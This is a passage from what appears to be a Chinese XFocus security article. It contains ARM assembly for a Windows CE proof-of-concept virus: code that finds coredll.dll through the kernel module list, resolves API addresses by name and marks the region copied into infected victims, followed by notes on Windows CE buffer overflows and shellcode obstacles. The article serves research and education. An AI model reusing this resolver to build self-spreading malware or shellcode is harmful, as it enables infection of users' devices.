cmpeq r3, #0<br />
moveq pc, lr<br />
<br />
cmp r2, r3<br />
beq wstrcmp_iterate<br />
<br />
mov pc, lr<br />
ENDP<br />
<br />
; get_export_section -- walk the kernel's module list until the entry<br />
; named "coredll.dll" is found and hand back its image base and export<br />
; directory. ARM ADS syntax, APCS register usage.<br />
; input:<br />
; none (reads the module list reached through KDataStruct)<br />
; output:<br />
; r0 - coredll base addr<br />
; r1 - export section addr<br />
; (if no name matches, the fall-through path returns r0 = 0 and<br />
; r1 = r8 + 0, r8 never having been loaded in that case)<br />
; clobbers: r0 - r3 and flags (r2/r3 via wstrcmp, whose body starts above<br />
; this listing); r4 - r9 and lr are saved by the stm/ldm pair below<br />
; note: the fixed KDataStruct address, the 0x324 / 0x7c / 0x8c offsets and<br />
; the UTF-16 "coredll.dll" string are version-specific constants (the text<br />
; below notes they differ between PDA vendors/versions) and form an easy<br />
; static signature for this resolver<br />
get_export_section PROC<br />
stmdb sp!, {r4 - r9, lr}<br />
<br />
ldr r4, =0xffffc800 ; KDataStruct (fixed kernel address)<br />
ldr r5, =0x324 ; aInfo[KINX_MODULES]<br />
<br />
add r5, r4, r5<br />
ldr r5, [r5] ; r5 = head of the module list<br />
<br />
; r5 now points to first module<br />
<br />
mov r6, r5 ; r6 = current module, r5 kept as list head<br />
mov r7, #0 ; r7 = base found so far (0 = none)<br />
<br />
iterate<br />
ldr r0, [r6, #8] ; get dll name<br />
adr r1, coredll<br />
bl wstrcmp ; compare with coredll.dll; EQ on match<br />
<br />
ldreq r7, [r6, #0x7c] ; get dll base<br />
ldreq r8, [r6, #0x8c] ; get export section rva<br />
<br />
add r9, r7, r8 ; no S suffix: flags from wstrcmp survive for beq;<br />
; r9 is not read again (r1 is recomputed at the end)<br />
beq got_coredllbase ; is it what we're looking for?<br />
<br />
ldr r6, [r6, #4] ; presumably the next-module link -- TODO confirm<br />
cmp r6, #0 ; stop on a null link ...<br />
cmpne r6, r5 ; ... or when the list wraps back to the head<br />
bne iterate ; nope, go on<br />
<br />
got_coredllbase ; reached on a match, or after a full pass without one<br />
mov r0, r7<br />
add r1, r8, r7 ; yep, we've got imagebase<br />
; and export section pointer<br />
<br />
ldmia sp!, {r4 - r9, pc}<br />
ENDP<br />
<br />
; UTF-16LE "coredll.dll" (each char followed by a 0x0 byte), terminated by<br />
; a 0x0,0x0 word; this is the string wstrcmp matches module names against<br />
coredll DCB "c", 0x0, "o", 0x0, "r", 0x0, "e", 0x0, "d", 0x0, "l", 0x0, "l", 0x0<br />
DCB ".", 0x0, "d", 0x0, "l", 0x0, "l", 0x0, 0x0, 0x0<br />
<br />
; basic string compare (8-bit strings)<br />
; in:  r7, r8 - pointers to NUL-terminated byte strings<br />
; out: flags only -- EQ when both strings end at the same position with<br />
;      every byte equal, NE at the first differing byte (a prefix of the<br />
;      other string also yields NE, since the NUL differs from the next byte)<br />
; clobbers: r9, r10, flags; r7 and r8 are left pointing past the last<br />
;      bytes compared<br />
bstrcmp PROC<br />
bstrcmp_iterate<br />
ldrb r9, [r7], #1 ; next byte of the first string, post-increment<br />
ldrb r10, [r8], #1 ; next byte of the second string<br />
<br />
cmp r9, #0<br />
cmpeq r10, #0 ; only executed when r9 == 0: EQ iff both are NUL<br />
moveq pc, lr ; both strings ended together -> return EQ<br />
<br />
cmp r9, r10<br />
beq bstrcmp_iterate ; same byte, keep going<br />
<br />
mov pc, lr ; mismatch -> return NE<br />
ENDP<br />
<br />
; lookup_imports -- resolve one export by name through the export<br />
; directory (AddressOfNames -> AddressOfNameOrdinals -> AddressOfFunctions)<br />
; in:<br />
; r0 - coredll base addr<br />
; r1 - export section addr<br />
; r2 - function name addr (NUL-terminated byte string)<br />
; out:<br />
; r9 - function address (base + AddressOfFunctions[ordinal])<br />
; clobbers: r7, r8, r10, flags (r7/r8 by the loop below, r9/r10 inside<br />
; bstrcmp); only r4 - r6 and lr are saved by the stm/ldm pair<br />
; note: the name loop is bounded only by a match, not by the directory's<br />
; NumberOfNames, so an absent name keeps it reading past the table<br />
lookup_imports PROC<br />
stmdb sp!, {r4 - r6, lr}<br />
<br />
ldr r4, [r1, #0x20] ; AddressOfNames (rva)<br />
add r4, r4, r0 ; r4 -> table of name rvas (va)<br />
<br />
mov r6, #0 ; counter = index of the name currently tested<br />
lookup_imports_iterate<br />
ldr r7, [r4], #4 ; next name rva, advance table pointer<br />
add r7, r7, r0 ; function name pointer (va)<br />
mov r8, r2 ; find function name<br />
<br />
bl bstrcmp ; EQ when the names are identical<br />
<br />
addne r6, r6, #1 ; no match: try the next index<br />
bne lookup_imports_iterate<br />
<br />
ldr r5, [r1, #0x24] ; AddressOfNameOrdinals<br />
add r5, r5, r0<br />
add r6, r6, r6 ; index * 2: ordinals are 16-bit entries<br />
ldrh r9, [r5, r6] ; Ordinals<br />
ldr r5, [r1, #0x1c] ; AddressOfFunctions<br />
add r5, r5, r0<br />
ldr r9, [r5, r9, LSL #2] ; function address rva (ordinal * 4)<br />
add r9, r9, r0 ; function address<br />
<br />
ldmia sp!, {r4 - r6, pc}<br />
ENDP<br />
<br />
; ASCII, NUL-terminated API names; presumably passed in r2 to<br />
; lookup_imports (the call sites are outside this listing). tp carries<br />
; extra padding so the ALIGN below lands on a word boundary.<br />
mb DCB "MessageBoxW", 0x0<br />
tp DCB "TerminateProcess", 0x0,0x0,0x0,0x0<br />
ALIGN 4<br />
<br />
; Dear User, am I allowed to spread?<br />
<br />
; UTF-16LE "Hello WinCE!" followed by two NUL words; presumably the text<br />
; handed to MessageBoxW (the call site is outside this listing)<br />
text DCB "H", 0x0, "e", 0x0, "l", 0x0, "l", 0x0, "o", 0x0, " ", 0x0<br />
DCB "W", 0x0, "i", 0x0, "n", 0x0, "C", 0x0, "E", 0x0, "!", 0x0<br />
DCB 0x0, 0x0, 0x0, 0x0<br />
ALIGN 4<br />
<br />
LTORG ; literal pool for the ldr rN, =const loads above (0xffffc800, 0x324)<br />
test_end ; end marker of the region described by the comment below<br />
<br />
; the code after test_end doesn't get copied to victims<br />
<br />
; host program entry point: tail-jumps to test_code_start, a label that is<br />
; defined outside this listing; nothing is pushed, so lr is untouched<br />
WinMainCRTStartup PROC<br />
b test_code_start<br />
ENDP<br />
<br />
; first generation entry point<br />
; out: r0 = ~0 = 0xffffffff (-1); returns straight to the caller<br />
host_entry<br />
mvn r0, #0 ; r0 = ~0<br />
mov pc, lr ; return<br />
END<br />
<br />
代码还是比较傻,如果能把Win32 shellcode的hash引入可能代码会更好看一些。Ratter/29A在WinCE4.Dust虽然还只是个概念病毒,但是病毒的基本技术它都已经具备了,所以不难相信不久就会有更多的Windows CE病毒。如果作者不怀好意,用KernelIoControl把系统引导入BootLoader模式,那么对于很多非专业的用户来说无疑象遭遇CIH病毒一般可恶。<br />
<br />
通过上面的代码不难相信很容易就能写出Windows CE下的shellcode,Seth Fogie在最近的defcon等会议上提到Windows CE下缓冲区溢出,随着PDA网络化程度越来越高,以及和手机的结合,相信Windows CE下的缓冲区溢出不久就会流行起来。不过Windows CE下缓冲区溢出可能会遭遇几个问题:<br />
<br />
1. Windows CE是一个Unicode环境,它可能会把用户输入的数据转成Unicode格式。<br />
2. 要在Windows CE上写解码shellcode可能会有些问题,首先arm没有xor指令,另外还有可能遭遇指令缓存的问题。不是很清楚Windows CE对软中断指令swi怎么支持。<br />
3. 不同厂商不同版本的PDA可能存在这样那样的差异,导致攻击程序无法通用。<br />
<br />
不过Windows CE现在已经发展得很成熟了,可以进来看看。<br />
<br />
--[ 4. 参考资料:<br />
<br />
1. ARM ASSEMBLER<br />
<a href='http://www.heyrick.co.uk/assembler/index.html' target='_blank'>http://www.heyrick.co.uk/assembler/index.html</a><br />
2. misc notes on the xda and windows ce<br />
<a href='http://www.xs4all.nl/~itsme/projects/xda/' target='_blank'>http://www.xs4all.nl/~itsme/projects/xda/</a><br />
3. Windows CE 3.0 Source Code<br />
<a href='http://msdn.microsoft.com/embedded/prevver/ce3/download/source/default.aspx' target='_blank'>http://msdn.microsoft.com/embedded/prevver/ce3/download/source/default.aspx</a><br />
4. Details Emerge on the First Windows Mobile Virus<br />
<a href='http://www.informit.com/articles/article.asp?p=337071' target='_blank'>http://www.informit.com/articles/article.asp?p=337071</a><br />
<br />
历史记录:<br />
<br />
1. 2004.11.09修正搜索API代码的一个错误。<br />
<br />
广告时间:<br />
<br />
本文将进一步扩充整理,作为XFocus Security Team的《网络渗透技术》(暂定名)一书中《Windows CE平台缓冲区溢出利用技术》一节。XFocus Security Team将在<a href='https://www.xfocus.net/bbs/index.php?act=ST&f=2&t=42618' target='_blank'>安全焦点技术研究版</a>对本书做全面技术支持。